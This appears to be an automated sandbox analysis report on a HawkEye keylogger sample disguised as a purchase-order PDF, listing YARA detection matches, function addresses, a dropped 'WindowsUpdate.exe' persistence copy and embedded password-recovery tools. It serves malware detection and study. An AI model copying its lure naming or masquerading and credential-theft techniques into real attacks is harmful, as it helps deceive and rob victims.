              Source: 8.2.WindowsUpdate.exe.1ee00000.5.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
              Source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
              Source: 8.2.WindowsUpdate.exe.1ee00000.5.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
              Source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
              Source: 8.2.WindowsUpdate.exe.1c5f0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
              Source: 8.2.WindowsUpdate.exe.1c5f0000.4.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
              Source: 11.2.WindowsUpdate.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
              Source: 11.2.WindowsUpdate.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
              Source: 11.2.WindowsUpdate.exe.1eed0000.5.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
              Source: 11.2.WindowsUpdate.exe.1eed0000.5.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
              Source: 11.2.WindowsUpdate.exe.1c5f0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
              Source: 11.2.WindowsUpdate.exe.1c5f0000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
              Source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
              Source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
              Source: 8.2.WindowsUpdate.exe.1ee00000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
              Source: 8.2.WindowsUpdate.exe.1ee00000.5.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
              Initial sample is a PE file and has a suspicious nameShow sources
              Source: initial sampleStatic PE information: Filename: PO 2010029_pdf Quotation from Alibaba Ale.exe
              Source: initial sampleStatic PE information: Filename: PO 2010029_pdf Quotation from Alibaba Ale.exe
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 3_2_00408836 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,FreeLibrary,3_2_00408836
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeCode function: 0_2_0040A2A50_2_0040A2A5
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeCode function: 0_2_00B140F10_2_00B140F1
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeCode function: 0_2_00B121EF0_2_00B121EF
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeCode function: 0_2_00AE012A0_2_00AE012A
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeCode function: 0_2_00AEA20A0_2_00AEA20A
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeCode function: 0_2_00B1526F0_2_00B1526F
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeCode function: 0_2_00AE03520_2_00AE0352
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeCode function: 0_2_00B145ED0_2_00B145ED
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeCode function: 0_2_00AE05C20_2_00AE05C2
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeCode function: 0_2_00B0975E0_2_00B0975E
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeCode function: 0_2_00AED8C00_2_00AED8C0
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeCode function: 0_2_00AE08230_2_00AE0823
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeCode function: 0_2_00AD39980_2_00AD3998
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeCode function: 0_2_00AE0A840_2_00AE0A84
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeCode function: 0_2_00ADFA9C0_2_00ADFA9C
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeCode function: 0_2_00B14A050_2_00B14A05
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeCode function: 0_2_00B0ABCC0_2_00B0ABCC
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 2_2_00404DDB2_2_00404DDB
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 2_2_0040BD8A2_2_0040BD8A
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 2_2_00404E4C2_2_00404E4C
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 2_2_00404EBD2_2_00404EBD
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 2_2_00404F4E2_2_00404F4E
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 3_2_004044193_2_00404419
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 3_2_004045163_2_00404516
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 3_2_004135383_2_00413538
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 3_2_004145A13_2_004145A1
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 3_2_0040E6393_2_0040E639
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 3_2_004337AF3_2_004337AF
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 3_2_004399B13_2_004399B1
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 3_2_0043DAE73_2_0043DAE7
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 3_2_00405CF63_2_00405CF6
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 3_2_00403F853_2_00403F85
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 3_2_00411F993_2_00411F99
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 8_2_0040A2A58_2_0040A2A5
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 8_2_00F140F18_2_00F140F1
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 8_2_00F121EF8_2_00F121EF
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 8_2_00EE012A8_2_00EE012A
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 8_2_00EE03528_2_00EE0352
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 8_2_00EE05C28_2_00EE05C2
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 8_2_00F0975E8_2_00F0975E
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 8_2_00EED8C08_2_00EED8C0
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 8_2_00EE08238_2_00EE0823
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 8_2_00ED39988_2_00ED3998
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 8_2_00EE0A848_2_00EE0A84
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 8_2_00EDFA9C8_2_00EDFA9C
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 8_2_00F0ABCC8_2_00F0ABCC
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 8_2_00EDFCC48_2_00EDFCC4
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 8_2_00F0DDAA8_2_00F0DDAA
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 8_2_00EEDD608_2_00EEDD60
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 8_2_00EEAEE08_2_00EEAEE0
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 8_2_00EDFEF78_2_00EDFEF7
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 8_2_00F0DED78_2_00F0DED7
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 8_2_00EECFA08_2_00EECFA0
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 8_2_1C882DC78_2_1C882DC7
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 8_2_1C8831648_2_1C883164
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 11_2_0040A2A511_2_0040A2A5
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 11_2_00F140F111_2_00F140F1
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 11_2_00F121EF11_2_00F121EF
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 11_2_00EE012A11_2_00EE012A
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 11_2_00F1526F11_2_00F1526F
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 11_2_00EEA20A11_2_00EEA20A
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 11_2_00EE035211_2_00EE0352
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 11_2_00F145ED11_2_00F145ED
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 11_2_00EE05C211_2_00EE05C2
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 11_2_00F0975E11_2_00F0975E
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 11_2_00EED8C011_2_00EED8C0
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 11_2_00EE082311_2_00EE0823
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 11_2_00ED399811_2_00ED3998
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 11_2_00EE0A8411_2_00EE0A84
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 11_2_00EDFA9C11_2_00EDFA9C
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 11_2_00F14A0511_2_00F14A05
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 11_2_00F0ABCC11_2_00F0ABCC
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 11_2_00EDFCC411_2_00EDFCC4
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 11_2_00F0DDAA11_2_00F0DDAA
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 11_2_00EEDD6011_2_00EEDD60
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 11_2_00EEAEE011_2_00EEAEE0
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 11_2_00EDFEF711_2_00EDFEF7
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 11_2_00F0DED711_2_00F0DED7
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 11_2_00F14E3A11_2_00F14E3A
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 11_2_00EECFA011_2_00EECFA0
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 11_2_1C96316411_2_1C963164
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 11_2_1C962EE211_2_1C962EE2
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: String function: 00413F8E appears 66 times
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: String function: 00413E2D appears 34 times
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: String function: 00442A90 appears 36 times
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: String function: 004141D6 appears 88 times
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: String function: 00411538 appears 35 times
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeCode function: String function: 00AF894D appears 46 times
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeCode function: String function: 00AD1080 appears 69 times
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeCode function: String function: 00AF63DC appears 32 times
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeCode function: String function: 00AD1BB0 appears 58 times
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: String function: 00EF894D appears 88 times
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: String function: 00ED302C appears 44 times
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: String function: 00ED1080 appears 176 times
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: String function: 00401ED0 appears 44 times
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: String function: 0040569E appears 36 times
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: String function: 00EF63DC appears 85 times
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: String function: 00ED2AC1 appears 36 times
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: String function: 00ED9F33 appears 44 times
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: String function: 00ED1BB0 appears 157 times
              Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2216
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: WindowsUpdate.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exeBinary or memory string: OriginalFilename vs PO 2010029_pdf Quotation from Alibaba Ale.exe
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exeBinary or memory string: OriginalFileName vs PO 2010029_pdf Quotation from Alibaba Ale.exe
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.321027884.0000000021BD0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameCMemoryExecute.dll@ vs PO 2010029_pdf Quotation from Alibaba Ale.exe
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.304520747.000000001B140000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs PO 2010029_pdf Quotation from Alibaba Ale.exe
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.316835361.000000001DCF1000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameWebBrowserPassView.exeF vs PO 2010029_pdf Quotation from Alibaba Ale.exe
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.316835361.000000001DCF1000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamemailpv.exe< vs PO 2010029_pdf Quotation from Alibaba Ale.exe
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.316835361.000000001DCF1000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamePhulli.exe0 vs PO 2010029_pdf Quotation from Alibaba Ale.exe
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.320060762.0000000021310000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameKernelbase.dll.muij% vs PO 2010029_pdf Quotation from Alibaba Ale.exe
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeSection loaded: security.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeSection loaded: security.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeSection loaded: security.dllJump to behavior
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
              Source: 00000008.00000002.308445225.000000001EE00000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
              Source: 00000008.00000002.308445225.000000001EE00000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
              Source: 00000008.00000002.305904316.000000001C5F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
              Source: 00000008.00000002.305904316.000000001C5F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
              Source: 00000008.00000002.308219748.000000001DBD1000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
              Source: 00000008.00000002.308219748.000000001DBD1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
              Source: 0000000B.00000002.312787394.000000001EE40000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
              Source: 0000000B.00000002.312787394.000000001EE40000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
              Source: 0000000B.00000002.312583133.000000001DCB1000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
              Source: 0000000B.00000002.312583133.000000001DCB1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
              Source: 0000000B.00000002.301969493.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
              Source: 0000000B.00000002.301969493.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
              Source: 00000008.00000002.300925836.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
              Source: 00000008.00000002.300925836.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
              Source: 0000000B.00000002.312957269.000000001EED2000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
              Source: 0000000B.00000002.312957269.000000001EED2000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
              Source: 00000000.00000002.316835361.000000001DCF1000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
              Source: 00000000.00000002.316835361.000000001DCF1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
              Source: 00000000.00000002.301261564.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
              Source: 00000000.00000002.301261564.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
              Source: 00000000.00000002.317001771.000000001EEAE000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
              Source: 00000000.00000002.317001771.000000001EEAE000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
              Source: 00000000.00000002.317140638.000000001EFE2000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
              Source: 00000000.00000002.317140638.000000001EFE2000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
              Source: 00000000.00000002.317057911.000000001EF40000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
              Source: 00000000.00000002.317057911.000000001EF40000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
              Source: 00000000.00000002.311897650.000000001C6F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
              Source: 00000000.00000002.311897650.000000001C6F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
              Source: 0000000B.00000002.309857450.000000001C5F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
              Source: 0000000B.00000002.309857450.000000001C5F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
              Source: 00000008.00000002.305233571.000000001AD92000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
              Source: 00000008.00000002.305233571.000000001AD92000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
              Source: 00000000.00000002.313417162.000000001CCF1000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
              Source: 00000000.00000002.313417162.000000001CCF1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
              Source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.ad0000.1.unpack, type: UNPACKEDPEMatched rule: MAL_RANSOM_COVID19_Apr20_1 date = 2020-04-15, hash1 = 2779863a173ff975148cb3156ee593cb5719a0ab238ea7c9e0b0ca3b5a4a9326, author = Florian Roth, description = Detects ransomware distributed in COVID-19 theme, reference = https://unit42.paloaltonetworks.com/covid-19-themed-cyber-attacks-target-government-and-medical-organizations/
              Source: 11.2.WindowsUpdate.exe.1c5f0000.3.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
              Source: 11.2.WindowsUpdate.exe.1c5f0000.3.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
              Source: 11.2.WindowsUpdate.exe.ed0000.1.unpack, type: UNPACKEDPEMatched rule: MAL_RANSOM_COVID19_Apr20_1 date = 2020-04-15, hash1 = 2779863a173ff975148cb3156ee593cb5719a0ab238ea7c9e0b0ca3b5a4a9326, author = Florian Roth, description = Detects ransomware distributed in COVID-19 theme, reference = https://unit42.paloaltonetworks.com/covid-19-themed-cyber-attacks-target-government-and-medical-organizations/
              Source: 8.2.WindowsUpdate.exe.ed0000.1.unpack, type: UNPACKEDPEMatched rule: MAL_RANSOM_COVID19_Apr20_1 date = 2020-04-15, hash1 = 2779863a173ff975148cb3156ee593cb5719a0ab238ea7c9e0b0ca3b5a4a9326, author = Florian Roth, description = Detects ransomware distributed in COVID-19 theme, reference = https://unit42.paloaltonetworks.com/covid-19-themed-cyber-attacks-target-government-and-medical-organizations/
              Source: 8.0.WindowsUpdate.exe.ed0000.0.unpack, type: UNPACKEDPEMatched rule: MAL_RANSOM_COVID19_Apr20_1 date = 2020-04-15, hash1 = 2779863a173ff975148cb3156ee593cb5719a0ab238ea7c9e0b0ca3b5a4a9326, author = Florian Roth, description = Detects ransomware distributed in COVID-19 theme, reference = https://unit42.paloaltonetworks.com/covid-19-themed-cyber-attacks-target-government-and-medical-organizations/
              Source: 0.0.PO 2010029_pdf Quotation from Alibaba Ale.exe.ad0000.0.unpack, type: UNPACKEDPEMatched rule: MAL_RANSOM_COVID19_Apr20_1 date = 2020-04-15, hash1 = 2779863a173ff975148cb3156ee593cb5719a0ab238ea7c9e0b0ca3b5a4a9326, author = Florian Roth, description = Detects ransomware distributed in COVID-19 theme, reference = https://unit42.paloaltonetworks.com/covid-19-themed-cyber-attacks-target-government-and-medical-organizations/
              Source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1efe0000.6.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
              Source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1efe0000.6.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
